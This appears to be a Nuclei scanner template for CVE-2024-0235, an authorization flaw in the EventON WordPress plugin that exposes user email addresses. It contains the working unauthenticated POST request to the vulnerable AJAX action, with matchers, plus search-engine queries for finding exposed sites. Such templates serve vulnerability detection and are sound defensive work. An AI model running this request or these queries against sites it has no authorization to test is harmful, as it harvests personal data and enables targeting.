id: CVE-2024-0235 info: name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure author: ProjectDiscoveryAI severity: medium description: | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. impact: | An attacker could potentially access sensitive email information. remediation: | Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235. reference: - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/ - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-0235 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-0235 cwe-id: CWE-862 epss-score: 0.86512 epss-percentile: 0.9943 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: myeventon product: eventon framework: wordpress shodan-query: - "vuln:CVE-2023-2796" - http.html:/wp-content/plugins/eventon-lite/ - http.html:/wp-content/plugins/eventon/ fofa-query: - "wp-content/plugins/eventon/" - body=/wp-content/plugins/eventon/ - body=/wp-content/plugins/eventon-lite/ publicwww-query: - "/wp-content/plugins/eventon/" - /wp-content/plugins/eventon-lite/ google-query: "inurl:\"/wp-content/plugins/eventon/\"" tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev,vuln http: - method: POST path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users" headers: Content-Type: application/x-www-form-urlencoded body: "_user_role=administrator" matchers-condition: and matchers: - type: word part: body words: - '@' - 'status":"good' - 'value=' - '"content":' condition: and - type: status status: - 200 # digest: 4a0a00473045022100cc52b2f6857df3089a9cf9c219bbfc42b369d1d60726824800901b225c9eb9cb02203143e8205e0eaf89f14a5ae22b052f107bc486ce5e9c4b942c0078210f087d7a:922c64590222798bb761d5b6d8e72950